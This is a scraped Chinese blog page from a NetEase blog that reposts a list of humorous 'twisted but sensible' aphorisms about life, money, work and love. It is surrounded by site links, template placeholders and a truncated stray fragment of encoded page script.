登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

19号的博客

欢迎各位朋友来访

 
 
 

日志

 
 

【引用】经典的人生歪理,歪的很有道理哦…  

2010-12-21 16:31:01|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
和大家分享这篇日志,我的看法是:

 
原文地址:经典的人生歪理,歪的很有道理哦…    原文作者:心灵之约

经典的人生歪理,歪的很有道理哦…… - 心灵之约 - .

经典的人生歪理,歪的很有道理哦……

▲一早醒来我以为我长大了,原来是被子盖横了。

▲发怒一分钟便失去60秒的幸福。

▲别人都在假装正经,我只好假装不正经。

▲你把别人想得太复杂,是因为你也不简单。

▲有的男人聪明得像天气,多变。有的女人傻的像天气预报,变天她都看不出来。

▲金钱就像卫生纸,看着挺多,用着用着就没了。

▲你要是不会玩生活,生活就把你玩了。

▲其实,一天班可短暂了,电脑一开一关就过去了。

▲命运又给我洗了一次牌,但玩牌的还是我自己。

▲有的时候已经很努力了,但结果却是个屁。

▲前途一片光明,可我找不到出路。

▲女人如果在抱怨一个与你无关的事情时,就当自己是耳朵。千万别插嘴,否则有你好看的。

▲金钱如粪土,朋友值千金。

▲每个人出生时都是原创的,可悲的是很多人渐渐地成了盗版。

▲如果寂寞能下酒,那爱情便是一场宿醉。

▲不倒翁虽然不会摔倒,但也因此不会前进一步。

▲只有一个人愿意等,另一个人才愿意出现。

模块分享

制作技巧

启步学代码

电脑知识

心情故事

音画欣赏

颜色代码

FLASH素材

Flash动画

开心一笑

艺术画廊

明星名人

健康生活

精美时钟

经典的人生歪理,歪的很有道理哦… - 心灵之约 - .cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A"<图画素材

流行时尚

竹簡字畫

免费电影

电子书架

图片加字

视频教程

做图软件

综合图库

典籍珍藏

游戏素材

报刊大全

在线服务

图片集锦

摩登时尚

明星博客

公文写作

搜索引擎

动物世界

动漫绘画

动画收藏

在线字典

趣味图库

背景边框

美眉佳丽

漂亮妹妹

阳光女孩

美眉帅哥

  评论这张
 
阅读(159)| 评论(2)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018